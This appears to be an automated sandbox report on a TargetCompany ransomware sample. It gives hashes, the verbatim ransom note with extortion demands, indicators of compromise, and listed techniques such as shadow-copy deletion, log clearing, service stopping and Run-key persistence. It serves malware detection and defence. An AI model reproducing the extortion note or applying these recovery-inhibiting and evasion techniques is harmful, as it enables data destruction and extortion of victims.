targetcompany | 2497c19fc0d51f7e9150792e207ff173ab33c7041a1bbd930bac2815e7fada84

Resubmissions

04-10-2022 20:15

221004-y1y84acfap 10

04-10-2022 18:07

221004-wqfynacagq 1

04-10-2022 17:17

221004-vtrc5abfc8 10

Analysis

max time kernel
568s
max time network
536s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2022 20:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1DB0F1BC49327D3FD4527A2C58F63AAA.exe
Size

10KB
MD5

1db0f1bc49327d3fd4527a2c58f63aaa
SHA1

4cc6ec7675e87c6a95ecd4625ccb5f7b156d6e28
SHA256

2497c19fc0d51f7e9150792e207ff173ab33c7041a1bbd930bac2815e7fada84
SHA512

5733576873c19de5b2d770a4423f2f4cd8e8408418e94a13c3df0b9fb8a51972e72d8cef35ff7ce940c917132285b98a656dd8b7bcf14c90354c74fb588f3c32
SSDEEP

192:pPCXxU4TtXGp7m2gSQ2LX/tFKkiKG0Rt0UEoLLCoNzpkpWvnWi:pP+U4TAp7jgSlLX/tFBfGE9zmWvnW

Score

10^/10

targetcompany discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-2891029575-1462575-1165213807-1000\RECOVERY FILES.txt

Ransom Note

YOUR FILES ARE ENCRYPTED !!! TO DECRYPT, FOLLOW THE INSTRUCTIONS: To recover data you need decrypt tool. To get the decrypt tool you should: 1.In the letter include your personal ID! Send me this ID in your first email to me! 2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files! 3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! 4.We can decrypt few files in quality the evidence that we have the decoder. Do not rename, do not use third-party software or the data will be permanently damaged CONTACT US: [email protected] If first email will not reply in 24 hours then contact with reserve address: [email protected] YOUR PERSONAL ID: 20E342F8E71B In case of non-payment of the ransom, your data may be published in the public domain. Our page in twitter with data leaks: https://twitter.com/mallox_leaks �

Emails

[email protected]

URLs

https://twitter.com/mallox_leaks

Signatures

TargetCompany
Ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
ransomware targetcompany

TargetCompany payload 6 IoCs

resource	yara_rule
behavioral2/memory/492-155-0x0000000000400000-0x000000000042F000-memory.dmp	family_targetcompany
behavioral2/memory/492-156-0x0000000000400000-0x000000000042F000-memory.dmp	family_targetcompany
behavioral2/memory/492-168-0x0000000000400000-0x000000000042F000-memory.dmp	family_targetcompany
behavioral2/memory/492-186-0x0000000000400000-0x000000000042F000-memory.dmp	family_targetcompany
behavioral2/memory/492-203-0x0000000000400000-0x000000000042F000-memory.dmp	family_targetcompany
behavioral2/memory/492-204-0x0000000000400000-0x000000000042F000-memory.dmp	family_targetcompany

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
4160	Process not Found
4068	Process not Found
908	Process not Found
2776	Process not Found
2296	Process not Found
3852	Process not Found
3628	Process not Found
1856	Process not Found
3284	Process not Found
3140	Process not Found
3968	Process not Found
2508	Process not Found
3984	Process not Found
4876	Process not Found
1868	Process not Found
3044	Process not Found
2132	Process not Found
2548	Process not Found
3028	Process not Found
3276	Process not Found
2844	Process not Found
3780	Process not Found
2936	Process not Found
3020	Process not Found
2328	Process not Found
4852	Process not Found
4960	Process not Found
3752	Process not Found
3956	Process not Found
3136	Process not Found
2588	Process not Found
2356	Process not Found
3508	Process not Found
3196	Process not Found
1356	Process not Found
4208	Process not Found
1860	Process not Found
2828	Process not Found
2308	Process not Found
1580	Process not Found
4008	Process not Found
1356	Process not Found
3564	Process not Found
2936	Process not Found
3576	Process not Found
4332	Process not Found
4436	Process not Found
3996	Process not Found
1960	Process not Found
4240	Process not Found
1968	Process not Found
2192	Process not Found
816	Process not Found
1640	Process not Found
2928	Process not Found
3848	Process not Found
3580	Process not Found
3104	Process not Found
4728	Process not Found
3984	Process not Found
1592	Process not Found
2828	Process not Found
2320	Process not Found
4164	Process not Found

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 13 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\UnprotectDebug.tiff => C:\Users\Admin\Pictures\UnprotectDebug.tiff.FARGO3	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\DenyPush.tiff => C:\Users\Admin\Pictures\DenyPush.tiff.FARGO3	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\ReadUninstall.png => C:\Users\Admin\Pictures\ReadUninstall.png.FARGO3	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\TraceCopy.png => C:\Users\Admin\Pictures\TraceCopy.png.FARGO3	aspnet_compiler.exe
File opened for modification	C:\Users\Admin\Pictures\UnprotectDebug.tiff	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\RegisterExpand.tif => C:\Users\Admin\Pictures\RegisterExpand.tif.FARGO3	aspnet_compiler.exe
File opened for modification	C:\Users\Admin\Pictures\StartSet.tiff	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\SubmitSet.raw => C:\Users\Admin\Pictures\SubmitSet.raw.FARGO3	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\StartSet.tiff => C:\Users\Admin\Pictures\StartSet.tiff.FARGO3	aspnet_compiler.exe
File opened for modification	C:\Users\Admin\Pictures\DenyPush.tiff	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\HideWrite.tif => C:\Users\Admin\Pictures\HideWrite.tif.FARGO3	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\NewUse.png => C:\Users\Admin\Pictures\NewUse.png.FARGO3	aspnet_compiler.exe
File renamed	C:\Users\Admin\Pictures\PublishEdit.raw => C:\Users\Admin\Pictures\PublishEdit.raw.FARGO3	aspnet_compiler.exe

Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	1DB0F1BC49327D3FD4527A2C58F63AAA.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2496	takeown.exe
4456	takeown.exe
3856	takeown.exe
1548	takeown.exe
2308	takeown.exe
3772	takeown.exe
3968	takeown.exe
4444	takeown.exe
3136	takeown.exe
4460	takeown.exe
2236	takeown.exe
1356	takeown.exe
4608	takeown.exe
1192	takeown.exe
3100	takeown.exe
4488	takeown.exe
908	takeown.exe
4220	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gjcyxvcg = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lznfgidcl\\Gjcyxvcg.exe\""	1DB0F1BC49327D3FD4527A2C58F63AAA.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	aspnet_compiler.exe
File opened (read-only)	\??\E:	aspnet_compiler.exe
File opened (read-only)	\??\N:	aspnet_compiler.exe
File opened (read-only)	\??\S:	aspnet_compiler.exe
File opened (read-only)	\??\K:	aspnet_compiler.exe
File opened (read-only)	\??\V:	aspnet_compiler.exe
File opened (read-only)	\??\W:	aspnet_compiler.exe
File opened (read-only)	\??\A:	aspnet_compiler.exe
File opened (read-only)	\??\F:	aspnet_compiler.exe
File opened (read-only)	\??\H:	aspnet_compiler.exe
File opened (read-only)	\??\L:	aspnet_compiler.exe
File opened (read-only)	\??\O:	aspnet_compiler.exe
File opened (read-only)	\??\P:	aspnet_compiler.exe
File opened (read-only)	\??\Q:	aspnet_compiler.exe
File opened (read-only)	\??\T:	aspnet_compiler.exe
File opened (read-only)	\??\X:	aspnet_compiler.exe
File opened (read-only)	\??\Y:	aspnet_compiler.exe
File opened (read-only)	\??\Z:	aspnet_compiler.exe
File opened (read-only)	\??\G:	aspnet_compiler.exe
File opened (read-only)	\??\I:	aspnet_compiler.exe
File opened (read-only)	\??\J:	aspnet_compiler.exe
File opened (read-only)	\??\M:	aspnet_compiler.exe
File opened (read-only)	\??\R:	aspnet_compiler.exe
File opened (read-only)	\??\U:	aspnet_compiler.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4912 set thread context of 492	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	109

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_18.svg	aspnet_compiler.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\COIN.WAV	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\CONCRETE.INF	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreLogo.scale-200.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageSplashScreen.scale-125_contrast-black.png	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ppd.xrm-ms	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteMediumTile.scale-100.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Views\Utilities\Styling\css\Content.css	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-400_contrast-black.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-30_altform-unplated_contrast-black.png	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder_18.svg	aspnet_compiler.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\id-ID\RECOVERY FILES.txt	aspnet_compiler.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\LiveTiles\RECOVERY FILES.txt	aspnet_compiler.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\dev\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\104.0.1293.47\EdgeWebView.dat	aspnet_compiler.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-63.png	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\ui-strings.js	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\it-IT\setup_wm.exe.mui	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\104.0.1293.47\ResiliencyLinks\Locales\is.pak.DATA	aspnet_compiler.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\1033\RECOVERY FILES.txt	aspnet_compiler.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\microsoft.system.package.metadata\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-64_altform-unplated_contrast-white.png	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\104.0.1293.47\Locales\hu.pak	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\104.0.1293.47\Locales\is.pak	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\TYPE.WAV	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-40_contrast-black.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\it-IT.PhoneNumber.ot	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\virgo_mycomputer_folder_icon.svg	aspnet_compiler.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntimeR_PrepidBypass-ppd.xrm-ms	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\VariableFrameRateVideoPlayer.xbf	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\ui-strings.js	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_neutral_split.scale-100_8wekyb3d8bbwe\images\splashscreen.scale-100.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\star_qtr.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSmallTile.scale-400_contrast-white.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	aspnet_compiler.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\ui-strings.js	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\en-GB\en-GB_female_TTS\ruleset_en-GB_TTS.lua	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-16.png	aspnet_compiler.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\Scripts\Me\MeControl\offline\RECOVERY FILES.txt	aspnet_compiler.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-pl.xrm-ms	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\GlowInTheDark.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\WideTile.scale-100.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\WideTile.scale-125.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\Office365LogoWLockup.scale-100.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockLargeTile.contrast-white_scale-100.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg5.jpg	aspnet_compiler.exe
File created	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\AppxMetadata\RECOVERY FILES.txt	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription1-ppd.xrm-ms	aspnet_compiler.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-140.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookSmallTile.scale-400.png	aspnet_compiler.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar	aspnet_compiler.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-60_altform-unplated.png	aspnet_compiler.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4408	sc.exe
2776	sc.exe
4544	sc.exe
1244	sc.exe
5048	sc.exe
4228	Process not Found
4008	sc.exe
2172	sc.exe
2184	sc.exe
5012	sc.exe
3160	sc.exe
1948	sc.exe
4752	sc.exe
384	sc.exe
3160	sc.exe
1528	sc.exe
3356	sc.exe
1432	sc.exe
2596	sc.exe
2184	sc.exe
4816	sc.exe
4356	sc.exe
2180	sc.exe
4788	sc.exe
5056	Process not Found
3308	sc.exe
2236	sc.exe
3364	sc.exe
2472	Process not Found
2288	sc.exe
3140	sc.exe
1604	sc.exe
2996	sc.exe
3340	Process not Found
2296	Process not Found
1048	sc.exe
1808	sc.exe
2544	sc.exe
1628	sc.exe
4484	sc.exe
1576	sc.exe
4144	sc.exe
4492	sc.exe
4132	sc.exe
1048	Process not Found
4160	Process not Found
4072	Process not Found
1496	sc.exe
3108	sc.exe
4196	sc.exe
1008	sc.exe
3580	sc.exe
3592	Process not Found
3340	Process not Found
3284	sc.exe
1748	sc.exe
2100	sc.exe
2384	sc.exe
3248	sc.exe
2052	sc.exe
1128	sc.exe
2508	sc.exe
2052	sc.exe
3460	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
3100	net.exe
2168	net.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery

T1057

pid	Process
1008	tasklist.exe
4208	tasklist.exe
1532	tasklist.exe
1048	tasklist.exe
768	tasklist.exe
1244	tasklist.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4072	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
2964	Process not Found
2828	Process not Found
3032	Process not Found
3952	Process not Found
1364	Process not Found
3236	Process not Found
3272	Process not Found
1280	Process not Found
4624	Process not Found
4984	taskkill.exe
1856	Process not Found
388	Process not Found
808	Process not Found
3820	taskkill.exe
1836	taskkill.exe
1080	taskkill.exe
4608	taskkill.exe
1964	Process not Found
4492	Process not Found
4720	Process not Found
1184	taskkill.exe
928	taskkill.exe
2820	Process not Found
3820	Process not Found
3300	Process not Found
1300	Process not Found
4492	Process not Found
4276	taskkill.exe
4796	Process not Found
4020	Process not Found
4092	Process not Found
384	taskkill.exe
3620	Process not Found
2508	Process not Found
4296	Process not Found
4468	taskkill.exe
4948	Process not Found
4968	Process not Found
3960	Process not Found
3504	Process not Found
396	Process not Found
4984	Process not Found
4260	taskkill.exe
648	taskkill.exe
396	taskkill.exe
4924	Process not Found
4220	Process not Found
3776	Process not Found
5072	Process not Found
4220	Process not Found
3940	taskkill.exe
744	taskkill.exe
1584	Process not Found
3508	Process not Found
548	Process not Found
1416	Process not Found
2588	Process not Found
2296	Process not Found
3032	Process not Found
3880	taskkill.exe
4240	taskkill.exe
3088	taskkill.exe
4784	Process not Found
3092	Process not Found

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
492	aspnet_compiler.exe
492	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe
Token: SeTakeOwnershipPrivilege	3968	takeown.exe
Token: SeTakeOwnershipPrivilege	2236	takeown.exe
Token: SeTakeOwnershipPrivilege	492	aspnet_compiler.exe
Token: SeDebugPrivilege	492	aspnet_compiler.exe
Token: SeBackupPrivilege	520	vssvc.exe
Token: SeRestorePrivilege	520	vssvc.exe
Token: SeAuditPrivilege	520	vssvc.exe
Token: SeTakeOwnershipPrivilege	1356	takeown.exe
Token: SeTakeOwnershipPrivilege	4444	takeown.exe
Token: SeTakeOwnershipPrivilege	3136	takeown.exe
Token: SeTakeOwnershipPrivilege	3856	takeown.exe
Token: SeTakeOwnershipPrivilege	2308	takeown.exe
Token: SeTakeOwnershipPrivilege	1192	takeown.exe
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	4240	taskkill.exe
Token: SeDebugPrivilege	744	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	4020	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	3880	taskkill.exe
Token: SeDebugPrivilege	2932	taskkill.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeDebugPrivilege	488	taskkill.exe
Token: SeDebugPrivilege	4916	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	5056	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	4800	taskkill.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	1008	tasklist.exe
Token: SeDebugPrivilege	4208	tasklist.exe
Token: SeDebugPrivilege	1532	tasklist.exe
Token: SeDebugPrivilege	1048	tasklist.exe
Token: SeDebugPrivilege	768	tasklist.exe
Token: SeDebugPrivilege	1244	tasklist.exe
Token: SeDebugPrivilege	5012	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	4728	sc.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	4060	sc.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	5076	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeDebugPrivilege	4912	taskkill.exe
Token: SeDebugPrivilege	4800	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	4484	sc.exe
Token: SeDebugPrivilege	4228	taskkill.exe
Token: SeDebugPrivilege	1184	sc.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	2572	net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2176	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4912 wrote to memory of 4780	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	89
PID 4912 wrote to memory of 4780	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	89
PID 4912 wrote to memory of 4780	4912	1DB0F1BC49327D3FD4527A2C58F63AAA.exe	89
PID 4780 wrote to memory of 4232	4780	cmd.exe	91
PID 4780 wrote to memory of 4232	4780	cmd.exe	91
PID 4780 wrote to memory of 4232	4780	cmd.exe	91
PID 4780 wrote to memory of 3968	4780	cmd.exe	92
PID 4780 wrote to memory of 3968	4780	cmd.exe	92
PID 4780 wrote to memory of 3968	4780	cmd.exe	92
PID 4780 wrote to memory of 716	4780	cmd.exe	93
PID 4780 wrote to memory of 716	4780	cmd.exe	93
PID 4780 wrote to memory of 716	4780	cmd.exe	93
PID 4780 wrote to memory of 4404	4780	cmd.exe	94
PID 4780 wrote to memory of 4404	4780	cmd.exe	94
PID 4780 wrote to memory of 4404	4780	cmd.exe	94
PID 4780 wrote to memory of 772	4780	cmd.exe	95
PID 4780 wrote to memory of 772	4780	cmd.exe	95
PID 4780 wrote to memory of 772	4780	cmd.exe	95
PID 4780 wrote to memory of 5092	4780	cmd.exe	96
PID 4780 wrote to memory of 5092	4780	cmd.exe	96
PID 4780 wrote to memory of 5092	4780	cmd.exe	96
PID 4780 wrote to memory of 1768	4780	cmd.exe	97
PID 4780 wrote to memory of 1768	4780	cmd.exe	97
PID 4780 wrote to memory of 1768	4780	cmd.exe	97
PID 4780 wrote to memory of 5048	4780	cmd.exe	98
PID 4780 wrote to memory of 5048	4780	cmd.exe	98
PID 4780 wrote to memory of 5048	4780	cmd.exe	98
PID 4780 wrote to memory of 2156	4780	cmd.exe	99
PID 4780 wrote to memory of 2156	4780	cmd.exe	99
PID 4780 wrote to memory of 2156	4780	cmd.exe	99
PID 4780 wrote to memory of 2832	4780	cmd.exe	100
PID 4780 wrote to memory of 2832	4780	cmd.exe	100
PID 4780 wrote to memory of 2832	4780	cmd.exe	100
PID 4780 wrote to memory of 3952	4780	cmd.exe	101
PID 4780 wrote to memory of 3952	4780	cmd.exe	101
PID 4780 wrote to memory of 3952	4780	cmd.exe	101
PID 4780 wrote to memory of 2544	4780	cmd.exe	102
